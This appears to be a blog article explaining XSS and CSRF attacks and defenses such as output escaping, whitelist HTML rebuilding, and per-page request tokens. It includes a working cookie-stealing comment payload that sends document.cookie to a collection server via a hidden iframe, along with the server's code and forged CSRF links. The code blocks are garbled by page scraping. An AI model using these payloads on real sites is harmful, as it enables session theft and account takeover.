laitimes

Summarizes the two cross-site attacks of XSS and CSRF

author:Get started with cybersecurity

XSS: Cross-site scripting

CSRF: Cross-site request forgery

In those days, dynamic SQL statements were constructed to create applications by stitching strings, so SQL injection became a popular attack. In this day and age, parameterized queries have become commonplace, and we are far from SQL injection. But XSS and CSRF, which are equally old, are not far from us. Since I was already familiar with XSS before, I have been very careful with the data entered by the user. If I don't filter through Tidy or the like when I enter it, I'll definitely escape it all when the template is output. So personally, it's easy to avoid XSS, and the point is to be "careful." But recently I heard about another cross-site attack, CSRF, so I looked for some information to understand and compared it with XSS.

XSS: An uninvited guest in a script

XSS, whose full name is "cross-site scripting," is a type of injection attack. It is characterized by not causing any harm to the server side, but through some normal intra-site interaction channels, such as posting comments and submitting content text containing JavaScript. At this time, if the server does not filter or escape these scripts, they are published to the page as content, and other users will run these scripts when they visit the page.

Among the consequences of running unexpected scripts is many, but it may be a simple prank - a window that cannot be closed:

123
           
while (true) {    alert("你关不掉我~");
}
           

It can also be a number theft or other unauthorized operation - let's simulate this process, first setting up a server to collect information:

123456789101112131415161718192021222324
           
#!/usr/bin/env python#-*- coding:utf-8 -*-"""
跨站脚本注入的信息收集服务器
"""import bottle
app = bottle.Bottle()
plugin = bottle.ext.sqlite.Plugin(dbfile='/var/db/myxss.sqlite')
app.install(plugin)@app.route('/myxss/')def show(cookies, db):
    SQL = 'INSERT INTO "myxss" ("cookies") VALUES (?)'
    try:
        db.execute(SQL, cookies)    except:        pass
    return ""if \_\_name\_\_ == "\_\_main\_\_":
    app.run()
           

Then inject this code into a comment on a page:

12345678910111213141516
           
// 用 <script type="text/javascript"></script> 包起来放在评论中(function(window, document) {    // 构造泄露信息用的 URL
    var cookies = document.cookie;    var xssURIBase = "http://192.168.123.123/myxss/";    var xssURI = xssURIBase + window.encodeURI(cookies);    // 建立隐藏 iframe 用于通讯
    var hideFrame = document.createElement("iframe");
    hideFrame.height = 0;
    hideFrame.width = 0;
    hideFrame.style.display = "none";
    hideFrame.src = xssURI;    // 开工
    document.body.appendChild(hideFrame);
})(window, document);
           

So everyone who visits the page with the comment has trouble — they don't know that a request is quietly being launched behind their backs that they can't see. This request sends information that contains their account number and other privacy to the collection server.

We know that the XMLHttpRequest objects used by AJAX technology are restricted by the browser, and can only access the URLs under the current domain name, which is not a "cross-domain" problem. This approach is also intended to protect against XSS, which more or less plays a role, but it is not always useful, just like the injected code above, and the same purpose can be achieved with iframe. Even if I want to, I can make a POST request with an iframe. Of course, some browsers can now intelligently analyze some XSS and block it, such as the new version of Firefox and Chrome. But interception doesn't always work, and there are a lot of users in the world who don't know what a browser is using the dreaded IE6. In principle, we shouldn't blame the browser for security, so the fundamental way to prevent XSS is to filter user input. User input is always untrustworthy, which should be common knowledge for web developers.

As mentioned above, if we don't need users to enter HTML but only want them to enter plain text, it is a good idea to escape all user input for HTML output. It seems that many developers of web development frameworks and template engines have also discovered this, and Django's built-in templates and Jinja2 templates always escape output variables by default. If we don't use them, we can do it ourselves. PHP can use the htmlspecialchars function, and Python can import cgi modules with the cgi.escape function. If you use a template engine, it must come with a convenient and fast escape method.

The real trouble is that in some cases we have to allow users to enter HTML and filter the scripts in it. HTML cleanup libraries like Tidy can help, but only if we use them carefully. It is useless to simply rudely remove the script tag, any legal HTML tag can add an event attribute like onclick to execute JavaScript. For complex situations, I personally prefer to use a simple method, and the simple method is to reorganize the whitelist. The HTML entered by the user may have a complex structure, but instead of storing this data directly into the database, we use the HTML parsing library to traverse the nodes and get the data in it (the REASON WHY WE DO NOT USE THE XML PARSITING LIBRARY IS BECAUSE HTML REQUIREs strong fault tolerance). The HTML element tree is then reconstructed based on the user's original tag attributes. During the construction process, all tags and attributes are only taken from the whitelist. This ensures that if some of the user's complex inputs are not recognized by the parser (as mentioned earlier, HTML is different from XML and requires strong fault tolerance), then it does not slip through the net, because the whitelisting strategy simply discards the unrecognized parts. The result is a new HTML element tree, and we can pat ourselves on the back to ensure that all tags and attributes are from the whitelist and will not be left out.

It now seems that most web developers understand XSS and know how to prevent it, and often large XSS attacks (including the XSS injection on Sina Weibo some time ago) are due to omissions. I personally recommend turning on (or not turning off) features like Django Template and Auto Escape in Jinja2 in Web projects that use the template engine. Where escaping is not required, we can cancel escaping in a similar way. This whitelisting approach helps reduce our risk of leaving XSS vulnerabilities behind due to omissions.

Another area of risk concentration is rich AJAX applications (such as Alpha City on Douban). The risk of such applications is not focused on the static response content of HTTP, so it is not possible to turn on the automatic escaping of templates once and for all. Coupled with the fact that such applications often need to cross domains, developers have to open dangerous doors on their own. In this case, the security of the site relies heavily on the developer's care and effective testing before the application goes live. There are also many open source XSS vulnerability test packages (it seems that there is an article that mentions that the development of Douban also uses automated XSS testing), but I have not tried it, so I will not evaluate. Anyway, I think it's always the cheapest and most efficient way to get it right from where the user enters.

CSRF: Impersonating the hand of a user

At first I couldn't figure out exactly what the difference was between CSRF and XSS, but then I realized that CSRF and XSS are basically two different dimensions of classification. XSS is one of many ways to implement CSRF, but it is definitely not the only one. It is common practice to refer to CSRFs implemented through XSS as XSRF.

The full name of CSRF is "cross-site request forgery", while the full name of XSS is "cross-site scripting". They all look a bit similar, they all fall into the category of cross-site attacks — attacking users who normally visit a website without attacking the server side, but as mentioned earlier, their attack types are categorized in different dimensions. CSRF, as the name suggests, is a forged request that impersonates the user's normal operation within the site. We know that the vast majority of websites identify users through cookies and other means (including websites that use server-side Sessions, because Session IDs are also mostly stored in cookies) and then authorized. Therefore, the best way to fake the user's normal operation is to use XSS or link spoofing to let the user initiate a request that the user does not know about on the local machine (that is, the browser side with the identity cookie).

Strictly speaking, CSRF cannot be classified as an injection attack because CSRF is implemented in a much more than XSS injection route. CsrF is easy to implement with XSS, but for poorly designed websites, a normal link can cause CSRF.

For example, a forum website post is accessed via a GET request, and after clicking On Post, JS stitches the posted content into a target URL and accesses:

http://example.com/bbs/create_post.php?title = Title &content = Content

Well, I just need to post one post in the forum with a link:

http://example.com/bbs/create_post.php?title = I'm brain dead & content = haha

As soon as someone clicks on the link, their account will unknowingly post the post. Maybe this is just a prank, but since the request to post can be forged, then deleting posts, transferring accounts, changing passwords, and sending emails can all be forged.

How do we solve this problem, and can we follow the example of XSS above? Filter user input and do not allow such links with in-site action URLs to be posted. This may be useful, but it will not stop CSRF, because the attacker can publish the link through QQ or other websites, and in order to disguise, it may also use bit.ly to compress the URL, so that users who click on this link will still be recruited. So when we approach CSRF, our perspective needs to be different from that of XSS. CSRF does not have to have in-station input because it is not an injection attack, but a request forgery. The forged request can be any source, not necessarily on the site. So there's only one way we can do it, and that's to filter the processors of the request.

The headache is that because the request can be initiated from any party, and the way to initiate the request is different, you can initiate the request through iframe, ajax (this can not be cross-domain, you have to XSS), Flash internally (always a big hidden danger). Since there is almost no way to completely eliminate CSRF, our general practice is to raise the threshold of attack in various ways.

One of the first thresholds that can be raised is to improve the design of the API in the station. For resource creation operations such as publishing posts, only POST requests should be accepted, and GET requests should only browse without altering server-side resources. Of course, the most ideal approach is to use a REST-style API design, GET, POST, PUT, DELETE four request methods corresponding to the resource read, create, modify, delete. Today's browsers basically do not support the use of PUT and DELETE request methods in forms, we can use ajax to submit requests (such as through the jquery-form plugin, my favorite practice), or we can use hidden fields to specify the request method, and then use POST to simulate PUT and DELETE (Ruby on Rails). As a result, the different resource operations are very clearly distinguished, and we narrow the problem domain to non-GET-type requests - it is no longer possible for attackers to forge requests by posting links, but they can still publish forms, or use forms that are invisible to our naked eyes on other sites, and use js operations in the background to forge requests.

Next, we can use a simpler and more effective way to defend against CSRF, which is called "request token". Students who have read "J2EE Core Mode" should be familiar with "synchronization token", "request token" and "synchronization token" principle is the same, but the purpose is different, the latter is to solve the problem of repeated post requests, the former is to ensure that the received request must come from the expected page. The implementation method is very simple, first the server side should generate a random string with some strategy, as a token, and save it in the Session. Then on the page where the request is made, the token is issued along with the other information in the form of a hidden domain. On the page that receives the request, compare the token in the received information with the token in the Session, and only process the request if it is consistent, otherwise it returns an HTTP 403 rejection request or requires the user to log back in to verify the identity.

Although the request token is simple to use, it is not unbreakable, and improper use will increase security risks. There are a few things to note about using request tokens to prevent CSRF:

  • Although the principle of request tokens and CAPTCHA are similar, a Session Key should not be used globally like CAPTCHA. Because the method of requesting a token is theoretically crackable, the method of cracking is to parse the text of the source page and obtain the token content. If a Session Key is used globally, the hazard factor rises. In principle, the request token for each page should be placed in a separate Session Key. When we design the server side, we can wrap it up a little bit, write a token toolkit, and use the identity of the page as the key to save the token in the Session.
  • In the case of more applications of ajax technology, because the request is initiated by JavaScript, it is more or less inconvenient to use a static template to output the token value. But in any case, please do not provide AN API that directly obtains the token value. Doing so would undoubtedly lock the door and then put the key at the door, causing our request token to degenerate into a synchronization token.
  • The first point says that the request token is theoretically crackable, so it is very important to consider using a verification code (an upgrade of the token, which is extremely difficult to crack at present), or require the user to enter the password again (amazon, Taobao practice). But neither way has a good user experience, so it needs to be weighed by product developers.
  • Whether it is an ordinary request token or a verification code, the server-side verification must remember to destroy. Forgetting to destroy used tokens is a very low-level but highly lethal mistake. Our school's course selection system has this problem, the verification code is used up and not destroyed, so as long as you get a verification code picture, the verification code can be used in multiple requests (as long as you do not refresh the verification code picture again), until the Session timeout is used. This is also why the course selection system added a verification code, and the plug-in software was still unimpeded after being upgraded once.

Here are some practices that are said to be effective against CSRF, but are actually ineffective.

  • The referrer determines the source page: the referer is in the HTTP Request Head, that is, it is determined by the sender of the request. If I like it, I can give the referer any value. Of course, this practice is not useless, at least it can prevent small white. But I think the price/performance ratio is not as good as the token.
  • Filter all user-posted links: This is the most ineffective approach, because the attacker does not have to initiate the request from the site (mentioned above), and even if the request is made from the site, the way is far from knowing the link. For example, <img src="./create_post.php" /> is a good choice, and does not require the user to click, as long as the user's browser will automatically load the picture, the request will be automatically initiated. *Alert the user with an alert pop-up on the request initiation page: this method seems to interfere with csrF initiated by iframe outside the station, but an attacker can also consider using window.alert = function(){}; Dumb alert, or simply break away from the iframe and use Flash for your purposes.

In general, few of the current approaches to defending CSRF are completely insoluble. Therefore, when you see articles on CSDN discussing CSRF, it will generally contain the word "shameless" to describe it (another one with this name seems to be a DDOS attack). As developers, all we can do is make it as difficult as possible to crack. When the cracking difficulty reaches a certain level, the website is approaching an absolutely safe location (although it cannot be reached). The above request token method, as far as I think is the most extensible, because its principle and CSRF principle are complementary. What CSRF is difficult to defend against is that on the server side, forged requests and normal requests are essentially the same. The way to request a token is to figure out the only difference in this request - the source page is different. We can also do further work, such as making the key of the token in the page dynamic, to further raise the threshold for an attacker. This article is only a summary of my personal understanding, so I will not discuss it too deeply.

Read on